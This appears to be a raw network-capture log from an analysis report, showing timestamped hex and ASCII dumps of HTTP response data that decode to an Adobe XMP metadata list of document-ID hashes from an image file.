                                                                                                                                                                                    Data Ascii: li> <rdf:li>01CFC55778C762972B70B7B2DB1347B9</rdf:li> <rdf:li>01DCC7E31AD06D19FB56C4BBA054E6F8</rdf:li> <rdf:li>01DD2CEFEEC63A24D0EDC9EDFB8CA3FD</rdf:li> <rdf:li>01DE9D0878AB3C1BEB8DC4E45D90B3E2</rdf:li> <rdf:li>01DFEB5B30B529CE0ABBE7D249D62A26</rdf:li> <
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2621INData Raw: 41 46 30 44 34 32 30 46 33 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 43 45 42 35 33 33 44 46 36 37 39 34 38 31 33 43 30 46 44 39 30 34 34 34 38 38 31 38 42 45 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 43 45 43 30 38 33 43 36 46 34 45 41 33 42 44 46 38 43 39 30 38 34 32 39 39 37 43 30 36 34 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 43 45 43 35 35 30 30 45 38 34 37 45 46 32 32 45 33 31 32 39 37 32 30 42 45 44 36 30 33 44 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 43 45 46 30 39 31 45 46 34 44 43 43 35 44 43 42 43 32 35 33 38 31 34 42 37 36 46 41 38 36 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 44 30 32 34 46 31 42 37 34 38 43 30 34 31 32 42 31 46 39 45 46 46 34 34 41 42
                                                                                                                                                                                    Data Ascii: AF0D420F36</rdf:li> <rdf:li>0CEB533DF6794813C0FD904448818BEF</rdf:li> <rdf:li>0CEC083C6F4EA3BDF8C90842997C0644</rdf:li> <rdf:li>0CEC5500E847EF22E3129720BED603D0</rdf:li> <rdf:li>0CEF091EF4DCC5DCBC253814B76FA86F</rdf:li> <rdf:li>0D024F1B748C0412B1F9EFF44AB
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2629INData Raw: 32 39 33 30 35 44 42 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 32 30 36 42 31 36 43 44 38 34 35 44 39 45 33 37 37 36 34 31 41 34 31 41 42 38 44 42 30 33 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 32 30 43 32 44 42 32 44 35 46 41 43 33 32 38 37 46 41 38 41 36 45 35 30 32 33 35 34 34 30 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 32 30 46 32 31 31 38 42 34 39 30 42 43 36 39 45 41 37 36 34 33 45 32 33 44 30 30 37 36 30 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 32 31 32 33 38 30 46 35 42 46 34 42 33 46 41 45 35 46 41 46 37 44 38 30 42 42 41 33 46 37 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 32 31 38 46 37 38 43 42 37 44 44 33 44 44 36 39 33 42 30 39 38 32 41 37 41 38 38 45
                                                                                                                                                                                    Data Ascii: 29305DBA</rdf:li> <rdf:li>1206B16CD845D9E377641A41AB8DB038</rdf:li> <rdf:li>120C2DB2D5FAC3287FA8A6E50235440C</rdf:li> <rdf:li>120F2118B490BC69EA7643E23D00760E</rdf:li> <rdf:li>1212380F5BF4B3FAE5FAF7D80BBA3F76</rdf:li> <rdf:li>1218F78CB7DD3DD693B0982A7A88E
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2645INData Raw: 39 39 43 33 39 30 34 41 37 42 31 38 31 31 41 45 31 31 31 45 32 32 38 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 44 38 41 35 43 42 41 32 39 46 39 36 31 32 35 35 30 33 33 30 45 32 39 32 33 38 41 34 30 38 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 44 39 41 39 44 44 36 46 36 38 45 43 34 35 37 45 39 31 30 32 30 30 31 37 31 39 42 35 37 34 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 44 39 46 38 45 42 36 36 31 36 37 37 36 38 45 34 46 30 39 46 46 46 30 39 31 38 34 44 46 36 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 44 41 33 35 32 35 36 44 31 45 41 42 32 45 32 44 36 34 37 44 33 46 36 45 33 46 46 42 45 34 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 44 43 43 36 46 42 35 46 30 38 35 46
                                                                                                                                                                                    Data Ascii: 99C3904A7B1811AE111E228B</rdf:li> <rdf:li>1D8A5CBA29F9612550330E29238A4087</rdf:li> <rdf:li>1D9A9DD6F68EC457E9102001719B5743</rdf:li> <rdf:li>1D9F8EB66167768E4F09FFF09184DF67</rdf:li> <rdf:li>1DA35256D1EAB2E2D647D3F6E3FFBE44</rdf:li> <rdf:li>1DCC6FB5F085F
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2677INData Raw: 44 39 37 37 34 43 31 42 42 44 39 30 32 36 37 36 42 45 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 38 44 34 33 36 37 35 34 46 42 39 38 36 39 39 39 31 39 31 42 44 32 44 38 33 36 36 30 33 31 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 38 44 41 44 32 38 41 38 42 44 38 46 38 46 41 32 39 37 45 44 43 30 46 42 43 37 35 32 35 39 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 38 45 32 30 38 33 45 31 32 33 33 41 46 32 38 36 44 43 35 32 31 34 34 33 42 36 46 30 43 42 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 38 45 38 39 38 36 35 46 33 37 31 38 37 44 31 43 41 45 36 41 36 46 44 44 31 31 34 42 46 37 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 38 45 39 41 36 41 44 42 36 31 32 33 43 39 31 30 39
                                                                                                                                                                                    Data Ascii: D9774C1BBD902676BE9</rdf:li> <rdf:li>28D436754FB986999191BD2D83660315</rdf:li> <rdf:li>28DAD28A8BD8F8FA297EDC0FBC75259D</rdf:li> <rdf:li>28E2083E1233AF286DC521443B6F0CB3</rdf:li> <rdf:li>28E89865F37187D1CAE6A6FDD114BF73</rdf:li> <rdf:li>28E9A6ADB6123C9109
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2692INData Raw: 35 42 39 33 42 33 34 33 30 33 33 36 41 30 38 37 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 44 39 46 45 38 31 42 46 33 45 41 36 41 31 39 42 30 31 34 38 42 39 46 33 46 31 42 42 43 44 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 44 42 33 41 31 44 35 36 30 36 37 45 34 36 33 41 35 34 39 44 30 46 42 33 46 43 30 43 35 41 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 44 43 43 44 43 44 38 39 31 46 39 35 43 46 44 37 34 33 32 37 44 44 30 44 34 37 42 37 43 41 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 44 44 35 30 46 30 39 45 34 44 36 46 39 38 46 41 30 32 30 41 32 36 38 37 41 36 35 37 31 33 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 44 45 37 31 39 32 33 38 42 43 41 43 46 43 37 34 39 36 45
                                                                                                                                                                                    Data Ascii: 5B93B3430336A0872</rdf:li> <rdf:li>2D9FE81BF3EA6A19B0148B9F3F1BBCDE</rdf:li> <rdf:li>2DB3A1D56067E463A549D0FB3FC0C5A2</rdf:li> <rdf:li>2DCCDCD891F95CFD74327DD0D47B7CA9</rdf:li> <rdf:li>2DD50F09E4D6F98FA020A2687A657134</rdf:li> <rdf:li>2DE719238BCACFC7496E
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2812INData Raw: 3e 33 39 35 43 31 45 30 45 46 41 46 45 46 38 36 30 46 37 41 37 45 33 43 34 31 31 46 45 34 31 34 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 39 35 43 38 36 44 36 31 32 34 37 34 33 31 41 31 44 41 43 45 41 36 35 41 45 44 36 37 37 33 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 39 36 36 38 44 34 42 45 32 31 44 44 36 43 31 43 37 30 37 33 32 36 37 30 38 39 42 31 38 43 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 39 37 33 33 38 33 38 37 34 30 43 34 31 33 44 31 31 30 38 30 31 34 45 41 44 44 44 31 36 33 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 39 37 39 31 41 39 46 39 34 31 45 30 42 31 32 39 30 36 32 41 39 37 32 34 43 31 31 34 30 35 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 39 38 30
                                                                                                                                                                                    Data Ascii: >395C1E0EFAFEF860F7A7E3C411FE414E</rdf:li> <rdf:li>395C86D61247431A1DACEA65AED67735</rdf:li> <rdf:li>39668D4BE21DD6C1C7073267089B18C7</rdf:li> <rdf:li>39733838740C413D1108014EADDD1635</rdf:li> <rdf:li>39791A9F941E0B129062A9724C11405E</rdf:li> <rdf:li>3980
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2876INData Raw: 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 34 37 46 38 42 38 37 35 41 35 37 36 41 32 32 42 45 33 38 31 41 31 39 37 34 30 33 44 36 35 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 34 41 32 37 35 36 32 35 42 39 39 41 45 35 31 31 30 31 45 43 44 39 32 36 43 41 41 44 33 42 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 34 41 36 43 43 30 32 32 43 30 32 34 45 39 33 34 33 45 30 38 30 45 32 35 38 31 39 45 33 38 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 34 41 42 42 41 30 45 41 33 33 31 35 35 31 45 31 41 38 38 41 42 30 45 38 38 36 36 33 34 33 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 34 43 38 35 43 34 36 46 31 32 41 38 38 45 34 43 42 43 34 39 42 41 36 37 45 43 45 38 36 38 32 3c 2f 72 64 66 3a
                                                                                                                                                                                    Data Ascii: /rdf:li> <rdf:li>447F8B875A576A22BE381A197403D653</rdf:li> <rdf:li>44A275625B99AE51101ECD926CAAD3B3</rdf:li> <rdf:li>44A6CC022C024E9343E080E25819E384</rdf:li> <rdf:li>44ABBA0EA331551E1A88AB0E88663430</rdf:li> <rdf:li>44C85C46F12A88E4CBC49BA67ECE8682</rdf:
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2885INData Raw: 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 39 37 35 39 33 43 30 45 34 30 33 34 31 36 30 46 39 37 45 36 31 30 30 33 35 38 39 35 30 34 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 39 37 41 42 32 35 34 39 36 32 44 39 45 41 30 39 41 32 44 30 41 35 44 35 44 32 38 45 34 31 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 39 37 42 34 41 36 32 42 41 31 46 44 39 36 32 36 37 32 31 35 35 34 30 42 45 36 41 38 44 43 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 39 38 35 39 41 31 43 32 34 31 39 38 38 35 33 41 32 41 31 31 34 30 30 45 34 37 34 39 37 32 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 39 41 41 44 44 36 33 35 43 43 31 32 34 35 42 37 30 46 30 44 45 36 34 32 36 43 41 33 36 45 44 3c 2f 72 64 66 3a 6c 69
                                                                                                                                                                                    Data Ascii: df:li> <rdf:li>497593C0E4034160F97E61003589504C</rdf:li> <rdf:li>497AB254962D9EA09A2D0A5D5D28E415</rdf:li> <rdf:li>497B4A62BA1FD96267215540BE6A8DCE</rdf:li> <rdf:li>49859A1C24198853A2A11400E4749721</rdf:li> <rdf:li>49AADD635CC1245B70F0DE6426CA36ED</rdf:li
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2917INData Raw: 33 39 33 34 33 46 36 38 35 38 33 34 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 35 42 32 39 33 31 31 37 34 37 43 36 43 46 34 30 41 33 36 38 45 33 36 37 46 35 35 44 30 46 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 35 42 34 41 30 37 31 45 37 32 45 32 42 43 37 38 30 39 46 38 37 37 30 42 46 37 36 41 44 32 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 ff e1 ff c5 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 6d 70 2f 65 78 74 65 6e 73 69 6f 6e 2f 00 46 43 43 45 39 30 36 44 34 44 32 37 31 44 32 36 35 32 33 45 39 46 35 42 35 33 33 31 33 42 43 32 00 11 77 83 00 05 fc d0 35 42 35 34 32 43 30 45 45 32 45 38 44 45 35 44 44 42 33 38 32 46 45 34 44 42 43 33 44 44 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64
                                                                                                                                                                                    Data Ascii: 39343F6858346</rdf:li> <rdf:li>55B29311747C6CF40A368E367F55D0F1</rdf:li> <rdf:li>55B4A071E72E2BC7809F8770BF76AD29</rdf:li> <rdf:li>5http://ns.adobe.com/xmp/extension/FCCE906D4D271D26523E9F5B53313BC2w5B542C0EE2E8DE5DDB382FE4DBC3DD6</rdf:li> <rd
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3053INData Raw: 37 45 45 33 36 42 30 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 32 34 42 42 46 41 33 36 33 46 37 39 31 34 45 43 35 45 43 41 38 42 30 39 30 30 45 42 33 37 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 32 35 44 33 32 43 44 45 37 37 33 41 33 33 37 43 41 42 41 39 35 39 45 35 32 44 32 39 34 31 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 32 36 38 46 43 44 39 32 43 46 32 39 30 32 34 35 31 36 30 42 41 37 30 33 42 44 39 34 45 44 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 32 37 46 32 42 42 34 32 30 46 31 32 33 46 36 39 46 46 38 32 46 32 32 33 41 41 35 41 33 38 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 32 38 31 34 36 45 36 41 32 31 39 44 38 46 41 37 31 43 32 39 41 45 36 42 33 34 35 38
                                                                                                                                                                                    Data Ascii: 7EE36B05</rdf:li> <rdf:li>624BBFA363F7914EC5ECA8B0900EB378</rdf:li> <rdf:li>625D32CDE773A337CABA959E52D29411</rdf:li> <rdf:li>6268FCD92CF290245160BA703BD94ED0</rdf:li> <rdf:li>627F2BB420F123F69FF82F223AA5A38B</rdf:li> <rdf:li>628146E6A219D8FA71C29AE6B3458
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3077INData Raw: 43 42 37 38 41 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 38 34 32 45 33 38 35 31 39 31 33 44 46 45 30 45 34 34 31 46 33 43 37 35 41 37 39 34 33 43 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 38 35 34 34 35 45 35 44 35 31 32 33 42 38 41 38 36 32 42 43 39 42 35 38 43 39 43 36 33 38 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 38 35 36 31 36 32 37 46 42 41 32 33 37 46 42 38 32 31 46 44 41 44 46 38 35 44 39 43 45 38 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 38 36 41 35 30 33 38 33 36 44 35 39 36 44 31 36 38 33 38 46 32 37 34 41 30 42 32 39 46 35 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 38 37 33 46 43 42 45 34 34 35 30 34 44 30 37 38 41 37 45 43 31 34 39 43 35 43 43 32 38 46
                                                                                                                                                                                    Data Ascii: CB78A9</rdf:li> <rdf:li>6842E3851913DFE0E441F3C75A7943CC</rdf:li> <rdf:li>685445E5D5123B8A862BC9B58C9C6383</rdf:li> <rdf:li>68561627FBA237FB821FDADF85D9CE89</rdf:li> <rdf:li>686A503836D596D16838F274A0B29F5F</rdf:li> <rdf:li>6873FCBE44504D078A7EC149C5CC28F
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3100INData Raw: 38 46 35 46 41 42 35 30 39 45 31 32 46 32 34 45 42 46 30 37 33 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 34 39 35 46 44 42 46 30 43 45 39 38 42 35 37 30 35 34 30 46 46 34 38 37 42 42 41 45 42 34 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 34 39 41 46 37 41 46 33 30 30 30 44 43 32 41 31 34 38 39 30 32 41 32 30 41 37 32 42 42 46 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 34 39 44 46 33 44 35 46 35 44 32 42 39 31 46 32 33 42 36 44 42 45 36 36 34 43 45 34 34 39 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 34 39 45 38 32 41 44 35 32 45 41 30 45 35 31 45 37 33 45 37 46 45 39 34 37 42 32 42 38 34 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 34 41 30 41 37 37 31 33 31 34 41 35 43 43
                                                                                                                                                                                    Data Ascii: 8F5FAB509E12F24EBF0739</rdf:li> <rdf:li>7495FDBF0CE98B570540FF487BBAEB4D</rdf:li> <rdf:li>749AF7AF3000DC2A148902A20A72BBF8</rdf:li> <rdf:li>749DF3D5F5D2B91F23B6DBE664CE449C</rdf:li> <rdf:li>749E82AD52EA0E51E73E7FE947B2B84E</rdf:li> <rdf:li>74A0A771314A5CC
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3132INData Raw: 64 66 3a 6c 69 3e 38 30 36 32 35 44 41 38 37 45 34 45 32 38 34 38 37 31 42 33 36 33 31 37 33 33 45 30 32 38 36 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 30 37 37 44 31 42 46 41 43 42 37 44 42 45 46 41 34 30 38 30 38 35 38 37 46 33 36 33 37 34 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 30 38 45 43 35 37 39 38 35 42 45 31 30 30 43 37 35 30 32 38 45 30 43 43 45 30 33 38 36 37 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 30 38 46 32 44 37 45 35 44 43 36 37 35 32 32 35 42 35 30 34 43 39 46 35 44 35 42 35 45 35 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 30 39 35 37 35 31 46 30 33 39 46 31 42 31 46 33 42 31 43 33 36 32 41 39 43 35 38 35 35 33 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69
                                                                                                                                                                                    Data Ascii: df:li>80625DA87E4E284871B3631733E0286B</rdf:li> <rdf:li>8077D1BFACB7DBEFA40808587F363745</rdf:li> <rdf:li>808EC57985BE100C75028E0CCE03867A</rdf:li> <rdf:li>808F2D7E5DC675225B504C9F5D5B5E5A</rdf:li> <rdf:li>8095751F039F1B1F3B1C362A9C585534</rdf:li> <rdf:li
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3172INData Raw: 3a 6c 69 3e 38 35 34 35 37 41 33 31 36 30 45 37 43 41 38 30 45 42 31 45 32 36 41 32 44 43 36 45 43 39 33 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 35 34 37 37 46 42 38 33 31 31 36 32 39 31 35 38 34 39 41 43 30 34 41 30 32 38 38 31 30 46 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 35 34 38 36 41 37 44 37 36 39 37 39 36 41 46 35 46 46 30 31 38 39 39 44 34 46 34 43 42 43 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 35 34 42 46 38 43 45 39 32 45 42 39 31 31 31 32 31 34 45 41 42 42 41 36 44 43 44 36 39 45 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 35 35 32 30 36 43 41 36 31 36 34 33 32 37 44 35 30 31 32 36 33 38 44 44 39 38 33 34 32 34 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38
                                                                                                                                                                                    Data Ascii: :li>85457A3160E7CA80EB1E26A2DC6EC932</rdf:li> <rdf:li>85477FB831162915849AC04A028810F6</rdf:li> <rdf:li>85486A7D769796AF5FF01899D4F4CBCB</rdf:li> <rdf:li>854BF8CE92EB9111214EABBA6DCD69E3</rdf:li> <rdf:li>855206CA6164327D5012638DD9834249</rdf:li> <rdf:li>8
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3196INData Raw: 46 45 30 44 45 32 35 34 35 43 36 42 44 46 46 44 44 39 37 45 46 37 33 44 42 32 44 30 32 33 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 46 45 34 34 36 33 33 39 32 46 30 30 30 32 39 46 41 42 34 31 32 37 34 30 33 43 37 38 38 44 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 46 45 36 46 46 34 35 38 35 37 38 43 31 36 42 30 35 35 38 39 37 30 31 43 38 33 46 44 45 35 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 46 45 43 38 46 37 44 35 38 42 39 46 37 36 32 42 35 43 38 32 31 35 36 36 42 38 33 43 35 37 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 30 30 32 33 43 43 32 33 46 44 42 36 41 41 43 34 46 38 33 46 46 42 37 36 31 33 38 35 45 45 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 30 30 36 32 41
                                                                                                                                                                                    Data Ascii: FE0DE2545C6BDFFDD97EF73DB2D023C</rdf:li> <rdf:li>8FE4463392F00029FAB4127403C788D4</rdf:li> <rdf:li>8FE6FF458578C16B05589701C83FDE5E</rdf:li> <rdf:li>8FEC8F7D58B9F762B5C821566B83C577</rdf:li> <rdf:li>90023CC23FDB6AAC4F83FFB761385EEC</rdf:li> <rdf:li>90062A
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3228INData Raw: 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 42 39 46 30 31 30 38 33 31 43 30 31 37 38 34 41 43 30 46 45 38 34 38 33 33 30 39 45 41 30 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 42 41 37 45 44 42 35 44 41 35 33 44 32 42 38 42 34 30 35 42 32 35 44 33 37 38 46 44 30 42 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 42 41 39 30 36 45 39 37 46 44 45 31 30 32 42 44 45 44 38 42 42 33 38 41 45 46 36 35 39 35 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 42 42 35 41 37 37 34 46 46 34 34 36 31 37 39 42 46 33 44 46 43 39 34 36 44 45 39 31 36 36 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 42 42 46 41 42 41 31 44 34 30 31 31 33 42 35 42 32 30 36 46 35 45 31 32 34 32 43 42 31 39 35 3c 2f 72 64 66 3a 6c 69
                                                                                                                                                                                    Data Ascii: df:li> <rdf:li>9B9F010831C01784AC0FE8483309EA02</rdf:li> <rdf:li>9BA7EDB5DA53D2B8B405B25D378FD0B2</rdf:li> <rdf:li>9BA906E97FDE102BDED8BB38AEF65956</rdf:li> <rdf:li>9BB5A774FF446179BF3DFC946DE91667</rdf:li> <rdf:li>9BBFABA1D40113B5B206F5E1242CB195</rdf:li
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3236INData Raw: 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 31 36 35 30 31 43 30 32 31 30 35 35 46 31 31 38 31 42 44 43 39 34 37 39 44 30 39 31 35 37 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 31 36 42 33 32 39 46 30 45 45 37 31 43 46 35 43 42 39 38 44 33 34 42 35 43 37 42 35 37 43 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 31 39 32 39 37 41 43 38 46 44 45 45 38 31 38 37 34 32 34 36 34 36 43 43 42 30 33 31 46 35 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 31 41 34 31 46 45 45 37 44 31 39 45 33 41 44 35 41 32 41 44 32 44 34 41 39 33 35 35 37 43 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 31 41 34 42 32 41 42 32 37 45 31 33 31 36 39 44 34 31 37 35 33 42 38 35 35 32 39 39 44 31 35 3c 2f 72 64 66 3a 6c 69 3e 20
                                                                                                                                                                                    Data Ascii: :li> <rdf:li>A16501C021055F1181BDC9479D091575</rdf:li> <rdf:li>A16B329F0EE71CF5CB98D34B5C7B57C7</rdf:li> <rdf:li>A19297AC8FDEE8187424646CCB031F5D</rdf:li> <rdf:li>A1A41FEE7D19E3AD5A2AD2D4A93557CE</rdf:li> <rdf:li>A1A4B2AB27E13169D41753B855299D15</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3253INData Raw: 3a 6c 69 3e 41 32 42 43 35 30 42 32 44 46 31 37 33 42 35 34 41 32 41 33 37 34 37 37 35 44 43 36 30 31 39 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 32 43 30 32 37 38 45 37 37 33 35 43 35 36 45 43 38 43 44 46 39 45 39 30 45 30 36 42 33 43 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 32 43 33 42 46 43 41 46 30 34 33 35 43 42 32 34 44 37 39 38 41 30 44 42 32 44 36 30 45 43 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 32 44 32 44 38 45 43 45 34 30 36 37 41 39 42 37 32 32 46 46 34 46 46 34 44 38 38 30 34 43 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 32 46 32 38 36 45 32 42 32 34 36 37 32 36 35 44 43 33 37 32 33 41 43 32 39 43 39 45 37 36 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41
                                                                                                                                                                                    Data Ascii: :li>A2BC50B2DF173B54A2A374775DC6019E</rdf:li> <rdf:li>A2C0278E7735C56EC8CDF9E90E06B3CA</rdf:li> <rdf:li>A2C3BFCAF0435CB24D798A0DB2D60EC2</rdf:li> <rdf:li>A2D2D8ECE4067A9B722FF4FF4D8804C0</rdf:li> <rdf:li>A2F286E2B2467265DC3723AC29C9E76C</rdf:li> <rdf:li>A
